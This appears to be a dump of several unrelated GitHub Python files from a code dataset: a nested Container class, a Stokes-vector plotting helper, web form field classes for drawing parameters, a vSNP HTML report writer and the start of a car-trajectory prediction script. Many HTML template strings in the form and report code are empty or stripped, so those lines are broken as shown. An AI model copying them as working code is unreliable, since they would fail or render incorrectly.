any(checks)\n\n # Public copy method: implements all macro copy operations\n def copy(self, con, overwrite=True):\n bad_type = True\n if isinstance(con, list):\n bad_type = any([not isinstance(_con, Container) for _con in con])\n elif isinstance(con, Container) or con is None:\n bad_type = False\n if bad_type:\n raise ValueError(\"Item for copying must be a Container, list of Containers, or None\")\n if isinstance(con, list):\n for _con in con:\n self.__copy(_con, overwrite)\n elif isinstance(con, Container):\n self.__copy(con, overwrite)\n return self\n\n # Private copy method: copies all variables of the given container into this one\n def __copy(self, con, overwrite=True):\n for name, value, partition in con.get_name_value_partitions():\n if self.var_exists(name, partition) and not overwrite:\n continue\n if isinstance(value, Container): # copy a container\n self.__set(name, Container().__copy(value), partition)\n elif not self.is_reserved(name): # copy a single var\n self.__set(name, value, partition)\n return self\n\n # Checkout returns a new container populated with the variable(s) called by name\n def checkout(self, name, partition=None, recurse=True, must_exist=False):\n if isinstance(name, str):\n name = [name]\n if isinstance(partition, str):\n partition = [partition]\n elif partition is None:\n partition = [None for i in range(len(name))]\n con = Container()\n for _name, _partition in zip(name, partition):\n value = self.__get(_name, _partition, recurse=recurse, must_exist=must_exist)\n if not value is None:\n con.__set(_name, value, _partition)\n return con\n\n # Merge combines all vars of this and the given container\n def merge(self, con, recurse_surface_var=True, coincident_only=True):\n if recurse_surface_var:\n self.merge_surface_var(con)\n self.merge_containers(con, coincident_only)\n return self\n\n # Merges all surface variables: those not in a descendant container\n # recurse: propagate all surface variables through descendant containers\n def merge_surface_var(self, con, recurse=True):\n for name, value, partition in self.get_name_value_partitions():\n if not isinstance(value, Container):\n if con.var_exists(name, partition) and not self.is_reserved(name): # merge required\n self.__set(name, con.get(name, partition), partition)\n elif recurse: # value is a container and surface vars are being propagated down\n value.merge_surface_var(con)\n return self\n\n # Merges all non-surface variables: those in descendant containers\n def merge_containers(self, con, coincident_only=True, in_recursion=False):\n for name, value, partition in con.get_name_value_partitions():\n if name == \"partitions\": # will be populated automatically\n continue\n if self.var_exists(name, partition): # in the given container: must be merged\n my_value = self.__get(name, partition)\n if isinstance(value, Container) and isinstance(my_value, Container): # merge two containers\n my_value.merge_containers(value, in_recursion=True)\n elif in_recursion: # only merge vars when in a descendant container\n self.__set(name, value, partition)\n elif not coincident_only:\n self.__set(name, value, partition)\n return self\n\n def walk(self):\n paths = {}\n leaf_paths = self._walk()\n for path in leaf_paths:\n for i in range(len(path), 0, -1):\n paths[tuple(path[:i])] = None # Cannot hash lists since they are mutable\n paths = [None] + [list(path) for path in paths.keys()] # [None] denotes the root path\n path_var_pairs= []\n for path in paths:\n con = self.get_container(path)\n for name, value, partition in con.get_name_value_partitions(False):\n path_var_pairs += [[path, [name, value, partition]]]\n return path_var_pairs\n\n def _walk(self):\n paths = []\n for name, value, partition in self.get_name_value_partitions(False):\n if self.is_container(name, partition):\n child_paths = value._walk() # Returns list of string lists (lists of strings)\n if len(child_paths) == 0: # Reached leaf container\n paths += [[name]]\n else: # Not a leaf container: prepend \"name\" to all child_paths\n paths += [[name] + path for path in child_paths]\n return paths\n\n def find(self, name, value, comparator=\"==\", partition=None, path=None, recurse=True):\n if isinstance(name, str): # cast to multi-condition\n name = [name]\n value = [value]\n elif not isinstance(value, list):\n raise ValueError(\n \"Input name=%s contains multiple instances but value=%s does not\" % (str(name), str(value))\n )\n elif len(name) != len(value):\n raise ValueError(\n \"Input name=%s does not map one-to-one with value=%s\" % (str(name), str(value))\n )\n if not isinstance(comparator, list): # broadcast comparator singleton to all name-value pairs\n comparator = [comparator for _ in range(len(name))]\n for i in range(len(comparator)):\n if isinstance(comparator[i], str):\n if not comparator[i] in util.comparator_fn_map:\n raise NotImplementedError(\"Unknown comparator=\\\"%s\\\"\" % (comparator[i]))\n comparator[i] = util.comparator_fn_map[comparator[i]]\n elif not isinstance(comparator[i], callable):\n raise ValueError(\n \"Input comparator=%s must be str, callable, or list of str and/or callable\" % (str(comparator))\n )\n con = Container()\n _con = self.get_container(path)\n for _name, _value, _partition in _con.get_name_value_partitions(False):\n if _con.is_container(_name, _partition):\n checks = []\n for __name, __value, __comparator in zip(name, value, comparator):\n checks.append(_value.__find(__name, __value, __comparator, partition, recurse))\n if all(checks):\n con.set(_name, _value, _partition)\n else:\n con.set(_name, _value, _partition)\n return con\n\n def __find(self, name, value, comparator=lambda a, b: a == b, partition=None, recurse=True, in_recursion=False):\n checks = []\n for _name, _value, _partition in self.get_name_value_partitions(False):\n if self.is_container(_name, _partition) and recurse:\n checks.append(_value.__find(name, value, comparator, partition, recurse, True))\n elif _name == name and _partition == partition:\n checks.append(comparator(_value, value))\n return any(checks)\n\n def hash(self, n_digits):\n _hash = self.__hash(n_digits) % 10**n_digits\n# if len(str(_hash)) < n_digits:\n# _hash += 10**(n_digits - 1)\n return _hash * 10**(n_digits - len(str(_hash)))\n\n def __hash(self, n_digits):\n _sum = 0\n for name, value, partition in self.get_name_value_partitions(sort=False):\n if self.is_reserved(name):\n continue\n if isinstance(value, Container):\n _sum += value.hash(n_digits)\n else:\n _sum += util.hash_str_to_int(name, n_digits)\n _sum += util.hash_str_to_int(str(value), n_digits)\n if not partition is None:\n _sum += util.hash_str_to_int(partition, n_digits)\n return _sum\n\n def get_names(self, sort=False):\n names = set()\n for key, value in self.get_key_values():\n partition = self.get_partition_from_key(key)\n name = self.get_name_from_key(key)\n if not self.is_reserved(name):\n names.add(name)\n names = list(names)\n if sort:\n names.sort()\n return names\n\n def get_values(self, sort=False):\n values = list(self.__dict__.values())\n if sort:\n values = sorted(values)\n return values\n\n def get_partitions(self, sort=False):\n partitions = self.__dict__.get(\"partitions\", [])\n if sort:\n partitions = sorted(partitions)\n return partitions\n\n def get_name_value_partitions(self, sort=True, order=\"\"):\n name_value_partitions = []\n for key, value in self.get_key_values():\n partition = self.get_partition_from_key(key)\n name = self.get_name_from_key(key)\n if not self.is_reserved(name):\n name_value_partitions += [[name, value, partition]]\n if sort:\n name_value_partitions.sort(key = lambda x: x[0])\n if order == \"basic_first\":\n first, last = [], []\n for name_value_partition in name_value_partitions:\n if isinstance(name_value_partition[1], Container):\n last += [name_value_partition]\n else:\n first += [name_value_partition]\n name_value_partitions = first + last\n return name_value_partitions\n\n # Validate the types are correct for of all inputs\n def validate_types(self, name, value, partition, path):\n self.validate_type(name, \"name\")\n self.validate_type(value, \"value\")\n self.validate_type(partition, \"partition\")\n self.validate_type(path, \"path\")\n\n # Validate the type is correct for the given input\n def validate_type(self, item, category):\n category_types_map = {\n \"name\": [util.Types.is_string],\n \"value\": [util.Types.is_anything],\n \"partition\": [util.Types.is_none, util.Types.is_string],\n \"path\": [util.Types.is_none, util.Types.is_list_of_strings],\n }\n bad_type = not any(type_func(item) for type_func in category_types_map[category])\n if bad_type:\n raise ValueError(\"%s has incorrect type: %s\" % (category.capitalize(), item))\n\n # Validate the type is correct for the given input\n def old_validate_type(self, item, category, multi_value=False):\n category_types_map = {\n \"name\": [util.Types.is_string, util.Types.is_list_of_strings],\n \"value\": [util.Types.is_list, util.Types.is_anything],\n \"partition\": [util.Types.is_none, util.Types.is_string, util.Types.is_list_of_strings],\n \"path\": [util.Types.is_none, util.Types.is_list_of_strings],\n }\n if multi_value:\n category_types_map[\"value\"] = [util.Types.is_list]\n bad_type = not any(type_func(item) for type_func in category_types_map[category])\n if bad_type:\n raise ValueError(\"%s has incorrect type: %s\" % (category.capitalize(), item))\n\n # Updates the reserved variable partitions\n def update_partitions(self, partition):\n if partition is None:\n return\n if not \"partitions\" in self:\n self.__dict__[\"partitions\"] = set()\n self.__get(\"partitions\").add(partition)\n\n # Create the key that will map this variable to its value\n def create_key(self, name, partition):\n key = \"\"\n if self.partition_sep in name:\n raise ValueError(\"Name cannot contain the partition-name separator \\\"%s\\\"\" % (self.partition_sep))\n if not partition is None:\n key += partition + self.partition_sep\n key += name\n return key\n\n # Get the container located at the given path\n # create: add a new container or containers to establish the path if it doesn't exist\n def get_container(self, path, create=False):\n if path is None:\n return self\n con = self\n for _path in path:\n if not con.path_exists(_path):\n if create:\n con.__set(_path, Container())\n else:\n raise ValueError(\"Path \\\"%s\\\" does not exist in this Container\" % (\n self.path_sep.join(path))\n )\n con = con.__get(_path)\n return con\n\n def get_keys(self):\n return self.__dict__.keys()\n\n def get_key_values(self):\n return self.__dict__.items()\n\n def get_partition(self, name, value):\n for key, _value in self.get_key_values():\n _partition = self.get_partition_from_key(key)\n _name = self.get_name_from_key(key)\n if name == _name and value == _value:\n return _partition\n\n def get_partition_from_key(self, key):\n partition = None\n if self.partition_sep in key:\n partition = self.partition_sep.join(key.split(self.partition_sep)[:-1])\n return partition\n\n def get_name_from_key(self, key):\n return key.split(self.partition_sep)[-1]\n\n def size(self):\n return len(self.get_keys())\n\n def get_memory_of(self):\n size = 0\n for key, value in self.get_key_values():\n if isinstance(value, Container):\n size += value.get_memory_of()\n else:\n size += sys.getsizeof(value)\n return size\n\n def key_exists(self, key):\n return key in self.__dict__\n\n def var_exists(self, name, partition=None, path=None, recurse=False):\n con = self.get_container(path)\n return con.key_exists(self.create_key(name, partition))\n\n def path_exists(self, path):\n if path is None:\n return False\n return self.key_exists(path) and self.is_container(path)\n\n def is_var(self, name, partition=None, path=None):\n return not self.is_container(name, partition, path)\n\n def is_container(self, name, partition=None, path=None):\n return isinstance(self.__get(name, partition, path), Container)\n\n def is_reserved(self, name):\n return name in self.reserved_names\n\n def is_empty(self):\n return self.size() == 0\n\n def to_dict(self):\n _dict = {}\n for key, value in self.get_key_values():\n _dict[key] = value\n if isinstance(value, Container):\n _dict[key] = value.to_dict()\n return _dict\n\n def from_dict(self, _dict):\n for key, value in _dict.items():\n if isinstance(value, dict):\n value = Container().from_dict(value)\n self.set(key, value)\n return self\n\n def to_string(self, recurse=True, sort=True, extent=[110, 1], in_recursion=False):\n def cut_x(line, x_extent):\n if x_extent < 0:\n return line\n j = line.rfind(\" = \") + 3\n cut_idx = max(j, x_extent)\n return line[:cut_idx] + \" ...\"\n def cut_y(var_string, y_extent):\n if y_extent < 0:\n return var_string\n var_string_lines = var_string.split(\"\\n\")\n return \"\\n\".join(var_string_lines[:y_extent])\n expand = True\n indent = 4 * \" \"\n lines = []\n max_key_len = -1\n for key, value in self.get_key_values():\n if len(key) > max_key_len:\n max_key_len = len(key)\n left_just = max_key_len\n for name, value, partition in self.get_name_value_partitions(sort=sort, order=\"basic_first\"):\n if self.is_reserved(name): # don't bother displaying reserved vars\n continue\n key = self.create_key(name, partition)\n value_string = str(value)\n if isinstance(value, Container):\n left_just = 0\n key = \"-> \" + key\n var_string = \"Container @ size(%s)\" % (util.format_memory(value.get_memory_of()))\n if recurse:\n var_string += \" = \\n%s%s\" % (\n indent,\n value.to_string(recurse, sort, extent, True).replace(\"\\n\", \"\\n%s\" % (indent))\n )\n var_string = \"%-*s = %s\" % (left_just, key, var_string)\n lines += var_string.split(\"\\n\")\n else:\n if isinstance(value, np.ndarray):\n var_string = \"NumPy.ndarray @ shape(\" + \", \".join(map(str, value.shape)) + \")\"\n if expand:\n var_string += \" = %s\" % (value_string)\n elif isinstance(value, torch.Tensor):\n var_string = \"PyTorch.Tensor @ shape(\" + \", \".join(map(str, value.shape)) + \")\"\n if expand:\n var_string += \" = %s\" % (value_string)\n elif isinstance(value, list):\n var_string = \"List @ len(%d)\" % len(value)\n if expand:\n var_string += \" = %s\" % (value_string)\n elif isinstance(value, dict):\n var_string = \"Dictionary @ len(%d)\" % len(value)\n if expand:\n var_string += \" = %s\" % (value_string)\n elif isinstance(value, set):\n var_string = \"Set @ len(%d)\" % len(value)\n if expand:\n var_string += \" = %s\" % (value_string)\n elif isinstance(value, str):\n var_string = \"String @ len(%d)\" % len(value)\n if expand:\n var_string += \" = \\\"%s\\\"\" % (value_string)\n else:\n var_string = value_string\n if var_string.count(\"\\n\") > extent[1]:\n var_string = cut_y(var_string, extent[1])\n lines += [\"%-*s = %s\" % (left_just, key, var_string)]\n if not in_recursion: # Only cut lines of final result\n for i in range(len(lines)):\n if len(lines[i]) > extent[0]: # Needs to be cut short\n lines[i] = cut_x(lines[i], extent[0])\n return \"\\n\".join(lines)\n\n def __eq__(self, con):\n if not isinstance(con, Container):\n return False\n if len(self) != len(con):\n return False\n if not self.get_keys() == con.get_keys():\n return False\n eqs = []\n for name, value, partition in self.get_name_value_partitions():\n eqs.append(value == con.__get(name, partition))\n return all(eqs)\n\n def __len__(self):\n return len(self.__dict__)\n\n def __str__(self):\n return self.to_string()\n\n def __contains__(self, obj):\n if isinstance(obj, (list, tuple)):\n return self.var_exists(obj[0], obj[1])\n elif not isinstance(obj, str):\n raise ValueError(\n \"Comparison object may be str or list/tuple of str w/ len=2. Recieved %s\" % (type(obj))\n )\n return self.key_exists(obj)\n\n def __getitem__(self, key):\n if isinstance(key, int) or isinstance(key, slice):\n return list(self.get_name_value_partitions())[key]\n return self.get(key)\n","repo_name":"HipGraph/HydroLearn","sub_path":"Container.py","file_name":"Container.py","file_ext":"py","file_size_in_byte":28899,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"31337984093","text":"import matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1.axes_divider import make_axes_locatable\n\ndef plot_stokes(stokes,normalized=False,cmap='inferno'):\n \"\"\"plots stokes vector\n\n Parameters\n ----------\n stokes : list or ndarray with first dimension of length 4\n Stokes vector array\n \"\"\"\n\n fig,ax = plt.subplots(ncols=4,figsize=[10,3])\n for i,data in enumerate(stokes):\n if normalized:\n data /= stokes[0]\n im = ax[i].imshow(data,cmap='inferno')\n div = make_axes_locatable(ax[i])\n cax = div.append_axes(\"right\", size=\"7%\", pad=\"2%\")\n cb = fig.colorbar(im,cax=cax)\n plt.show()\n\n","repo_name":"Jashcraf/polarization-gsmts-II","sub_path":"plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"40626269114","text":"import os\nimport random\nimport copy\nfrom html import escape\nfrom hashlib import md5\n\n\nclass Params(dict):\n def __init__(self, editor=None):\n super(Params, self).__init__()\n if editor:\n for field in editor:\n self[field.name] = field.default\n\n def randomize(self, editor):\n for field in editor:\n # FIX: This is very specific to sandtable drawing methods\n if field.name not in ['width', 'length']:\n value = field._random()\n if value is not None:\n self[field.name] = value\n\n def hash(self):\n h = md5()\n h.update(bytes(str(self.items), 'utf-8'))\n return h.hexdigest()\n\n def __getattribute__(self, attr):\n if attr in self:\n return self[attr]\n return super(Params, self).__getattribute__(attr)\n\n\nclass Dialog:\n def __init__(self, editor, form, params, autoSubmit=False):\n self.editor = editor\n self.form = form\n self.autoSubmit = autoSubmit\n self.params = params if params else Params()\n\n def getAction(self):\n return self.form.action\n\n def getMethod(self):\n return self.form.method\n\n def getParams(self):\n # Run through all of the editor fields converting form or editor defaults into params\n # Check all of the values for validity and generate errors if there are issues\n self.errors = {}\n for field in self.editor:\n if hasattr(self.params, field.name):\n continue\n if hasattr(field, 'fromFormRaw'):\n self.params[field.name] = field.fromFormRaw(self.form)\n elif field.name in self.form:\n try:\n value = field.fromForm(self.form.get(field.name))\n except ValueError:\n self.errors[field.name] = \"Invalid, set to default\"\n value = field.default\n err = field.errorCheck(value)\n if err:\n value = err[0]\n self.errors[field.name] = err[1]\n self.params[field.name] = value\n else:\n self.params[field.name] = field.default\n return self.params\n\n def html(self):\n s = '
\\n'\n for field in self.editor:\n s += '
%s
' % field.prompt\n s += '
%s %s
' % (field.toForm(getattr(self.params, field.name)), field.units)\n if field.name in self.errors:\n s += '
%s
' % self.errors[field.name]\n s += '
\\n'\n s += '
'\n return s\n\n\nclass DialogField:\n def __init__(self, name, prompt, units, default, min, max, randRange):\n self.name = name\n self.prompt = prompt\n self.units = units\n self.default = default\n self.min = min\n self.max = max\n self.randRange = randRange\n\n def toForm(self, value):\n return None\n\n def fromForm(self, value):\n return None\n\n def errorCheck(self, value):\n if self.min is not None and value < self.min:\n return (self.min, \"Too low, set to minimum\")\n if self.max is not None and value > self.max:\n return (self.max, \"Too high, set to maximum\")\n return None\n\n\nclass DialogFloat(DialogField):\n def __init__(self, name, prompt, units='', default=0.0, min=None, max=None, randRange=None, format='%g', rbutton=False, slider=True, step=None, rRound=4):\n DialogField.__init__(self, name, prompt, units, default, min, max, randRange)\n self.format = format\n self.rbutton = rbutton\n self.slider = slider if min is not None and max is not None else False\n self.step = step if step else (max - min) / 100. if self.slider else None\n self.rRound = rRound\n\n def toForm(self, value):\n v = self.format % value\n if self.rbutton:\n button = '' % (self.name, self.min, self.max)\n else:\n button = ''\n if self.slider:\n slider = '' % (\n self.name, self.min, self.max, self.step, v, self.name, self.name)\n sliderInform = 'onchange=\"%s_s.value=%s.value\"' % (self.name, self.name)\n else:\n slider = ''\n sliderInform = ''\n return '%s%s' % (self.name, v, sliderInform, slider, button)\n\n def fromForm(self, value):\n return float(value)\n\n def _random(self):\n if self.randRange:\n return round(random.triangular(self.randRange[0], self.randRange[1], self.default), self.rRound)\n return None if self.min is None or self.max is None else round(random.triangular(self.min, self.max, self.default), self.rRound)\n\n\nclass DialogFloats(DialogField):\n def __init__(self, name, prompt, units='', default=[], min=None, max=None, randRange=None, minNums=None, maxNums=None, rRound=4):\n DialogField.__init__(self, name, prompt, units, default, min, max, randRange)\n self.minNums = minNums\n self.maxNums = maxNums\n self.rRound = rRound\n\n def toForm(self, value):\n return '' % (self.name, self._format(value))\n\n def fromForm(self, value):\n return [float(num) for num in value.split(',')]\n\n def errorCheck(self, value):\n error = False\n for i in range(len(value)):\n if self.min is not None and value[i] < self.min:\n value[i] = self.min\n error = True\n if self.max is not None and value[i] > self.max:\n value[i] = self.max\n error = True\n if error:\n return (value, \"Numbers were out of range\")\n return None\n\n def _format(self, values):\n return ','.join([\"%g\" % n for n in values])\n\n def _random(self):\n if self.randRange:\n count = random.randint(self.minNums, self.maxNums)\n return [round(random.triangular(self.randRange[0], self.randRange[1], self.max), self.rRound) for i in range(count)]\n if self.minNums and self.maxNums:\n count = random.randint(self.minNums, self.maxNums)\n return [round(random.triangular(self.min, self.max), self.rRound) for i in range(count)]\n return None\n\n\nclass DialogInt(DialogField):\n def __init__(self, name, prompt, units='', default=0, min=None, max=None, randRange=None, format='%d', rbutton=False, slider=True):\n DialogField.__init__(self, name, prompt, units, default, min, max, randRange)\n self.format = format\n self.rbutton = rbutton\n self.slider = slider if min is not None and max is not None else False\n\n def toForm(self, value):\n v = self.format % value\n if self.rbutton:\n button = '' % (self.name, self.min, self.max)\n else:\n button = ''\n if self.slider:\n slider = '' % (\n self.name, self.min, self.max, v, self.name, self.name)\n sliderInform = 'onchange=\"%s_s.value=%s.value\"' % (self.name, self.name)\n else:\n slider = ''\n sliderInform = ''\n return '%s%s' % (self.name, v, sliderInform, slider, button)\n\n def fromForm(self, value):\n return int(float(value))\n\n def _random(self):\n if self.randRange:\n return int(random.triangular(self.randRange[0], self.randRange[1], self.default))\n return None if self.min is None or self.max is None else int(random.triangular(self.min, self.max, self.default))\n\n\nclass DialogInts(DialogField):\n def __init__(self, name, prompt, units='', default=[], min=None, max=None, randRange=None, minNums=None, maxNums=None):\n DialogField.__init__(self, name, prompt, units, default, min, max, randRange)\n self.minNums = minNums\n self.maxNums = maxNums\n\n def toForm(self, value):\n return '' % (self.name, self._format(value))\n\n def fromForm(self, value):\n return [int(num) for num in value.split(',')]\n\n def errorCheck(self, value):\n error = False\n for i in range(len(value)):\n if self.min is not None and value[i] < self.min:\n value[i] = self.min\n error = True\n if self.max is not None and value[i] > self.max:\n value[i] = self.max\n error = True\n if error:\n return (value, \"Numbers were out of range\")\n return None\n\n def _format(self, values):\n return ','.join([\"%d\" % n for n in values])\n\n def _random(self):\n if self.randRange:\n return [random.randint(self.randRange[0], self.randRange[1]) for i in range(random.randint(self.minNums, self.maxNums))]\n if self.minNums and self.maxNums:\n return [random.randint(self.min, self.max) for i in range(random.randint(self.minNums, self.maxNums))]\n return None\n\n\nclass DialogStr(DialogField):\n def __init__(self, name, prompt, units='', default='', length=20):\n DialogField.__init__(self, name, prompt, units, default, None, None, None)\n self.length = length\n\n def toForm(self, value):\n return '' % (self.name, self.length, escape(value))\n\n def fromForm(self, value):\n return value\n\n def _random(self):\n return None\n\n\nclass DialogList(DialogField):\n def __init__(self, name, prompt, units='', default='', list=[]):\n DialogField.__init__(self, name, prompt, units, default, None, None, None)\n self.list = list\n\n def toForm(self, value):\n str = ''\n return str\n\n def fromForm(self, value):\n return value\n\n def _random(self):\n return self.list[random.randint(0, len(self.list) - 1)]\n\n\nclass Dialog2Choices(DialogList):\n def __init__(self, name, prompt, units='', default=False, list=['True', 'False']):\n DialogList.__init__(self, name, prompt, units, default, list)\n\n def toForm(self, value):\n if value:\n return DialogList.toForm(self, self.list[1])\n else:\n return DialogList.toForm(self, self.list[0])\n\n def fromForm(self, value):\n return value == self.list[1]\n\n def _random(self):\n return random.randint(0, 1)\n\n\nclass DialogYesNo(Dialog2Choices):\n def __init__(self, name, prompt, units='', default=False):\n DialogList.__init__(self, name, prompt, units, default, list=['No', 'Yes'])\n\n\nclass DialogTrueFalse(Dialog2Choices):\n def __init__(self, name, prompt, units='', default=False):\n DialogList.__init__(self, name, prompt, units, default, list=['False', 'True'])\n\n\nclass DialogOnOff(Dialog2Choices):\n def __init__(self, name, prompt, units='', default=False):\n DialogList.__init__(self, name, prompt, units, default, list=['Off', 'On'])\n\n\nclass DialogFile(DialogField):\n def __init__(self, name, prompt, default='', filter='', extensions=False):\n DialogField.__init__(self, name, prompt, '', default, None, None, None)\n self.filter = filter\n self.filters = filter.split('|')\n self.extensions = extensions\n\n def _extension(self, filename):\n pieces = filename.split('.')\n if len(pieces) < 2:\n return ''\n return '.' + pieces[-1].lower()\n\n def toForm(self, value):\n str = ''\n return str\n\n def fromForm(self, value):\n if value and len(value) and not value[0] in '/\\\\~.':\n return value\n return self.default\n\n def _random(self):\n path = self.default\n def fl(f): return not f.startswith('.') and (self._extension(f) in self.filters or os.path.isdir(os.path.join(path, f)))\n while True:\n dirlist = list(filter(fl, os.listdir(path)))\n if not len(dirlist):\n return None\n f = dirlist[random.randint(0, len(dirlist) - 1)]\n if not os.path.isdir(os.path.join(path, f)):\n return os.path.join(path, f)\n path = os.path.join(path, f)\n\n\nclass DialogFont(DialogField):\n def __init__(self, name, prompt, default='', filter='', extensions=False):\n DialogField.__init__(self, name, prompt, '', default, None, None, None)\n self.filter = filter\n self.filters = filter.split('|')\n self.extensions = extensions\n\n def _extension(self, filename):\n pieces = filename.split('.')\n if len(pieces) < 2:\n return ''\n return '.' + pieces[-1].lower()\n\n def toForm(self, value):\n str = ''\n return str\n\n def _getFonts(self):\n fonts = []\n for root, dirs, files in os.walk('/usr/share/fonts'):\n for file in files:\n if file.endswith('.ttf'):\n fonts.append((file[:-4], os.path.join(root, file)))\n fonts.sort()\n return fonts\n\n def fromForm(self, value):\n return value\n\n def _random(self):\n fonts = self._getFonts()\n return fonts[random.randint(0, len(fonts) - 1)][1]\n\n\nclass DialogMulti(DialogField):\n def __init__(self, name, prompt, default='', rows=5, cols=20):\n DialogField.__init__(self, name, prompt, '', default, None, None, None)\n self.rows = rows\n self.cols = cols\n\n def toForm(self, value):\n str = ''\n return str\n\n def fromForm(self, value):\n return value\n\n def _random(self):\n return None\n\n\nclass DialogColor(DialogField):\n def __init__(self, name, prompt, default=(255, 255, 255)):\n DialogField.__init__(self, name, prompt, '', default, None, None, None)\n\n def toForm(self, value):\n color = \"#%02x%02x%02x\" % value\n str = '' % (self.name, color)\n return str\n\n def fromForm(self, value):\n value = value.lstrip('#')\n lv = len(value)\n return tuple(int(value[i:i+int(lv/3)], 16) for i in range(0, lv, int(lv/3)))\n\n def _random(self):\n return (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))\n\n\nclass DialogBreak(DialogField):\n def __init__(self, name='', prompt='', default=''):\n DialogField.__init__(self, name, prompt, '', default, None, None, None)\n\n def toForm(self, value):\n return ''\n\n def fromForm(self, value):\n pass\n\n def _random(self):\n return None\n\n\nclass ArrayValue:\n def __repr__(self):\n return '['+','.join(['%s:%s' % (n, getattr(self, n)) for n in [x for x in dir(self) if not x.startswith('_')]])+']'\n\n\nclass DialogArray(DialogField):\n def __init__(self, name='', prompt='', default='', fields=None, length=3):\n DialogField.__init__(self, name, prompt, '', default, None, None, None)\n self.fields = fields\n self.length = length\n\n def toForm(self, value):\n result = '
'\n\n titles = '
'\n units = '
'\n for field in self.fields:\n titles += '
%s
' % field.prompt\n units += '
%s
' % field.units\n titles += '
'\n units += ''\n result += titles + units\n\n for row in range(self.length):\n result += '
'\n for field in self.fields:\n fieldCopy = copy.copy(field)\n fieldCopy.name += \"-%d\" % row\n result += '
%s
' % fieldCopy.toForm(getattr(value[row], field.name))\n result += '
{starting_vcf_number} VCF files in this run \", file=htmlfile)\n if subset_boolen:\n print(f\"\\n
Subset ran, {keep_count:,} VCF files used in analysis.
\", file=htmlfile)\n print(f\"{remove_from_analysis_count} VCF files in this run were removed from analysis \", file=htmlfile)\n print(f\"{fixed_vcf_number_removed} VCF files in this run were corrupt and therefore removed
\", file=htmlfile)\n\n #OPTIONS\n if all_vcf_boolen:\n print(\"\\n
Groupings with {samples_count_listed_groups:,} listed:
', file=htmlfile)\n print(\"
\", file=htmlfile)\n print(\"
Sample Name
\", file=htmlfile)\n\n samples_count_listed_groups = len(samples_groups_dict)\n for key, value in samples_groups_dict.items():\n print(\"
\", file=htmlfile)\n print(f\"
{key}
\", end='\\t', file=htmlfile)\n for group in value:\n print(f\"
{group}
\", end='\\t', file=htmlfile)\n print(\"
\", file=htmlfile)\n print(\"
\", file=htmlfile)\n\n # REPORT DIFFERENCES BETWEEN STARTING FILES AND ENDING FILES REPRESENTED IN ALIGNMENTS AND TABLES\n # if start_end_file_diff_count < 1:\n # print(\"\\n
No files dropped from the analysis. Input files are equal to those represented in output.
\", file=htmlfile)\n # else:\n # print(\"\\n
{} files have been dropped. They either need a group, mixed and not finding a group or an error occured.
\", file=htmlfile)\n # for i in difference_start_end_file:\n # print(\"
{}
\" .format(i), file=htmlfile)\n # print(\"
\", file=htmlfile)\n # print(\" \", file=htmlfile)\n #Capture program versions for step 2\n try:\n print(\"\\n
Program versions:
\", file=htmlfile)\n versions = os.popen('conda list biopython | grep -v \"^#\"; \\\n conda list numpy | egrep -v \"^#|numpydoc\"; \\\n conda list pandas | grep -v \"^#\"; \\\n conda list pysam | grep -v \"^#\"; \\\n conda list pyvcf | grep -v \"^#\"; \\\n conda list raxml | grep -v \"^#\"').read()\n versions = versions.split('\\n')\n for i in versions:\n print(\"%s \" % i, file=htmlfile)\n except:\n # logging.debug(\"Unable to capture versions\")\n pass\n # print(\"Dependent source: {} \" .format(arg_options['script_dependents']), file=htmlfile)\n\n #FILES NOT RENAMED\n # if names_not_changed is None:\n # print(\"\\n
File names did not get changed:
\", file=htmlfile)\n # for i in sorted(names_not_changed):\n # print(\"%s \" % i, file=htmlfile)\n\n print(\"\\n\", file=htmlfile)\n htmlfile.close()","repo_name":"USDA-VS/vSNP","sub_path":"bin/vsnp_html_step2_summary.py","file_name":"vsnp_html_step2_summary.py","file_ext":"py","file_size_in_byte":6232,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"3"}
+{"seq_id":"72011402962","text":"import numpy as np\nimport ast\nfrom scipy.interpolate import interp1d\nfrom utils.dataset_types import MotionState\nfrom model.carTrackTransformerEncoder import CarTrackTransformerEncoder\nimport torch\nfrom collections import OrderedDict\nfrom model_inference import inference\nfrom tqdm import tqdm\n\n\ndef process(ego_id, init_frame_id, ego_path_dict_file='utils_folder/ego_path_dict.npy', traffic_dict_file='utils_folder/track_dict.npy', predicting_frames=50):\n # 读取主车路径文件: ego_path_dict_file\n ego_path_dict = np.load(ego_path_dict_file, allow_pickle=True)\n ego_path_dict = str(ego_path_dict)\n ego_path_dict = ast.literal_eval(ego_path_dict)\n ego_path_dict = dict(ego_path_dict)\n\n # 读取交通车信息文件: traffic_dict_file\n traffic_dict = np.load(traffic_dict_file, allow_pickle=True)\n traffic_dict = str(traffic_dict)\n traffic_dict = ast.literal_eval(traffic_dict)\n traffic_dict = dict(traffic_dict)\n\n # 创建 model\n d_model = 16\n nhead = 4\n num_layers = 1\n model_path = 'model_ckpt/epoch_999.pth'\n model = CarTrackTransformerEncoder(num_layers=num_layers, nhead=nhead, d_model=d_model)\n weights = torch.load(model_path, map_location='cpu')\n delete_module_weight = OrderedDict()\n for k, v in weights.items():\n delete_module_weight[k[7:]] = weights[k]\n model.load_state_dict(delete_module_weight, strict=True)\n model.eval()\n\n # 获得主车初始状态\n init_ego_x, init_ego_y, init_ego_yaw, init_ego_vx, init_ego_vy, init_S = get_inital_state(ego_id, init_frame_id, ego_path_dict) \n # init_ve = get_ve(init_ego_vx, init_ego_vy, init_ego_yaw)\n init_ve = init_ego_vx * np.cos(init_ego_yaw) + init_ego_vy * np.sin(init_ego_yaw)\n\n # 获得初始历史轨迹\n init_ego_history_path = initial_ego_history(init_ego_x, init_ego_y, init_ego_yaw)\n cur_ego_history_path = init_ego_history_path\n\n # 循环初始状态\n cur_frame_id = init_frame_id\n cur_S, cur_ego_x, cur_ego_y = init_S, init_ego_x, init_ego_y\n cur_vx, cur_vy = init_ego_vx, init_ego_vy\n cur_yaw = init_ego_yaw\n cur_ve = init_ve\n \n # 循环50次(5秒)\n prediction_track_dict = {}\n # while len(prediction_track_dict) < 50:\n for i in tqdm(range(predicting_frames)):\n # for i in range(32):\n # 